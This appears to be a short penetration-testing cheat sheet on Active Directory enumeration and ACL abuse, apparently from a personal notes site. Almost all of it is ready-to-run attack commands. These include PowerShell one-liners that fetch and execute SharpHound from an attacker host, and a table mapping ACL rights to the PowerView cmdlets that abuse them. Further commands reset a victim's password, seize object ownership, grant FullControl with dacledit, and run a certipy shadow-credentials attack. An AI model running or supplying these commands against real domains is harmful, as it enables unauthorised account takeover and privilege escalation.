Bloodhound

SharpHound

IEX(New-Object Net.WebClient).downloadFile('http://10.10.14.10/SharpHound.exe', 'SharpHound.exe')

.\SharpHound.exe --CollectionMethods All

IWR -Uri http://10.10.14.10/SharpHound.exe -OutFile SharpHound.exe

.\SharpHound.exe -c All --zipfilename QU35T

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10/SharpHound.ps1')

Invoke-BloodHound -CollectionMethod All

Bloodhound.py

bloodhound.py --zip -c All -d qu35t.pw -u 'qu35t' -p 'Password1!' -ns 172.17.0.3

ACL Abuse

Object

Abused with

ForceChangePassword

Set-DomainUserPassword

Add Members

Add-DomainGroupMember

GenericAll

Set-DomainUserPassword / Add-DomainGroupMember

GenericWrite

Set-DomainObject

WriteOwner

Set-DomainObjectOwner

WriteDACL

Add-DomainObjectACL

AllExtendedRights

Set-DomainUserPassword / Add-DomainGroupMember

Addself

Add-DomainGroupMember

Via Windows :

net group backups qu35t /add

Set-DomainObjectOwner -identity jeff -OwnerIdentity qu35t 

Add-DomainObjectAcl -TargetIdentity jeff -PrincipalIdentity qu35t -Rights ResetPassword 

$cred = ConvertTo-SecureString 'Passw0rd!' -AsPlainText -force

Set-DomainUserPassword -identity jeff -accountpassword $cred

getTGT.py qu35t.pw/qu35t
KRB5CCNAME=qu35t.ccache dacledit.py -k -no-pass -dc-ip 10.10.10.10 -principal qu35t -target "Network Audit" -action write -rights FullControl qu35t.pw/qu35t

net rpc group addmem "Network Audit" -k -U qu35t -S qu35t.pw qu35t

KRB5CCNAME=qu35t.ccache certipy shadow auto -k -no-pass -u qu35t.pw/qu35t@dc.qu35t.pw -dc-ip 10.10.10.10 -target dc.qu35t.pw --account yakei

PreviousImpacket NextPowershell

Last updated 1 year ago